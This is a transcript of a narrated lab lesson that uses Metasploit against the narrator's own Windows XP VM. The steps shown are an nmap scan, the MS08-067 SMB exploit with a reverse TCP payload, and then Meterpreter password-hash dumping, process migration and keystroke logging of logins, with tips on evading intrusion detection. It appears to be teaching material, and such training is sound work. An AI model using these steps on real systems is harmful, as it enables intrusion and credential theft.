Starting Metasploit
>> It's time to enter the world of MSF, Metasploit Framework.
I fired up my Kali VM once again and opened up a terminal.
First I started the Postgresql Database Service.
Postgresql is an open source relational DBMS, database management system, used by Metasploit.
After that, I created and initialized the Metasploit Framework database
with the command msfdb init.
You'll only enter this command the first time you go through these steps.
Subsequently, it will be msfdb start instead of msfdb init.
Finally, it's time to run msfconsole, the most popular interface to the Metasploit Framework.
It's an all-in-one centralized console that allows you
to efficiently access the MSF options.
I'm going to run this in a second terminal.
MSF runs in its own environment,
and I like having a bash shell prompt handy just in case I need it.
[ Silence ]
After a little bit, you'll see the MSF prompt.
Each time you load MSF, you'll see a different cute and funny text display.
Exploit and Payload Demo
>> I've opened up a second instance of VMWare work station player
with good ol' Windows XP as the VM.
Like my cally box, my Windows XP box is in bridged mode.
Therefore, my windows host machine, my cally VM
and my Windows XP VM are all on the same sub-net.
I brought end map right into the mix.
Dash upper case A performs tons of tests on the target IP address, including OS detection,
version detection, script scanning and trace route.
Dash lower case V specifies that we want verbose output.
[silence]
Notice, towards the bottom of the output, there are lines regarding SMB.
Server message block security on the XP machine.
SMB allows for sharing of files and printers.
Furthermore, port 445 used for directly hosted SMB over TCP IP is open.
Let's see all exploits associated with SMB vulnerabilities.
[silence]
Let's zone in on one of the most famous exploits of all time.
[silence]
Great. Let's use it.
You'll notice that the prompt changes to a specific exploit prompt.
Let's understand where we are.
We've identified a vulnerability of SMB on the target machine.
We've selected the MS08067 net API exploit.
Now, we need a pay load
[silence]
Let's zone in on my favorite one.
[silence]
Let's use it.
Using this payload, we're going to get the victim machine
to initiate a TCP connection back to us.
That's much better than an unsolicited connection coming into the victim machine
from an unknown IP address, which would be flagged by a firewall, IDS or IPS.
Now, we need to configure the exploit.
[silence]
Show targets will give you a list of all the targets that this exploit works for.
[silence]
Based on the output from N map earlier, I'll type set target two.
Keeping the default of target zero, automatic targeting is fine as well.
Let's see the options again.
[silence]
Let's set the remote host with the IP address of my Windows XP box.
[silence]
Let's set the local host using the IP address of this Kali box.
Show options, again, verifies our settings.
We could change the local port from 4444 to avoid detection since IDS is almost likely know
about Metasploit's use of port 4444.
But we'll just leave it for now.
Ready to exploit?
Bam.
We're in. We now own the XP box.
What could we do here?
Let's take a look.
[silence]
Meterpreter Demo
>> Let's take a look at some cool Meterpreter commands.
Sysinfo.
Now we've got some information about the compromised system.
Hashdump.
Ahh! Now you can use these hashes in a brute force attack,
a dictionary attack, or a rainbow table attack.
Idletime. It's been this long since there were hands on a keyboard of the compromised system.
This information could be helpful in determining
if an attacker should be daring now or wait a little bit.
Ps, a list of every running process on the compromised system.
Kill
In this case with a process ID of 1364.
Do you see the Windows command line interface on the Windows XP system?
No, you don't.
Poof. It's gone.
[ Silence ]
Migrate.
Meterpreter's migrate command allows us to move our running code into a process
that has interactive access to the compromised system.
The running payload will be migrated into the explorer.exe process when I specify 1608.
This explorer.exe process is owned by the active user.
Now we can use keyscan_start --
-- to log every single one of the user's keystrokes, including the arrow keys,
the backspace key, the delete key, and more.
If we wanted to capture system login information,
we'd migrate to the winlogon process, which will capture the credentials
of all users logging into the system.
This is dependent, of course, on the machine being in a running state.
Rebooting or shutting down the compromised system would end our Meterpreter session.
[ Silence ]
Keyscan_dump.
There it is.
[ Silence ]
Let's sign in to EDX.
[ Silence ]
Let's sign in to my courses.
[ Silence ]
Let's check our Gmail.
[ Silence ]
It's all there.
[ Silence ]
Keyscan_stop.
Shell pops up a Windows command line interface within Meterpreter.
We can execute networking commands.
[ Silence ]
Yes! I'm actually sending pings from the compromised Windows XP system.
We can execute file system commands.
We just made a directory.
[ Silence ]
We just made a file.
[ Silence ]
We just deleted a file.
We just removed a directory.
127
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
